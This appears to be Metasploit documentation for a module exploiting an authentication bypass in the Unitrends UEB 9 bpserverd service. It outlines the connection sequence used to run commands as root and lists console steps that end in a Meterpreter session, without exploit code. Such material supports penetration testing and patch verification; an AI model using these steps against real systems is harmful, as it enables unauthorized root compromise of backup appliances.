Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/linux/misc/ueb9_bpserverd.md
Views: 11789
Vulnerable Application
Unitrends UEB 9 bpserverd authentication bypass RCE
This exploit uses roughly the same process to gain root execution as does the apache user on the Unitrends appliance. The process is something like this:
Connect to xinetd process (it's usually running on port 1743)
This process will send something like:
?A,Connect36092
Initiate a second connection to the port specified in the packet from xinetd (36092 in this example)
send a specially crafted packet to xinetd, containing the command to be executed as root
Receive command output from the connection to port 36092
Close both connections
Verification Steps
use exploit/linux/misc/ueb9_bpserverd
set lhost [IP]
set rhost [IP]
exploit
A meterpreter session should have been opened successfully